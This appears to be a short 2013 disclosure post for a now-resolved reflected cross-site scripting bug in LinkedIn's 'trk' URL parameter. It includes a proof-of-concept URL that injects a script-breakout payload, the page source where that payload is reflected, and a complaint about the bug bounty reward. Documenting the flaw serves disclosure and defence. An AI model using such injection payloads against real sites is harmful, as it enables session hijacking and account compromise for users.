linkedin.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Resolved

Resolved: XSS in trk parmeter of www.linkedin.com as an authenticated user.

Reported to security@linkedin.com on June 11, 2013 and resolved today, August 18, 2013.

PoC URL

http://www.linkedin.com/today/?trk=today_home_top_today_control</script><sc
ript>alert(1)</script>

MATCH ON:

fs.config({“failureRedirect”:”http://www.linkedin.com/nhome/”,”xhrHeaders”:
{“X-FS-Origin-Request”:”/today/?trk=today_home_top_today_control</script><s
cript>alert(1)</script>”,”X-FS-Page-Id”:”pulse-top-news”}});

REQUIRED: Logged In User

Script injection to www.linkedin.com via trk parameter
XSS in linkedin.com

Commentary: LinkedIn has a Vulnerability  Rewards Program which results in sending a T-Shirt, which is ridiculous. Instead, its suggested that Linked In donate US$1,000.00 to the  American Cancer Society for Melanoma and Squamous Cell  Carcinoma Research.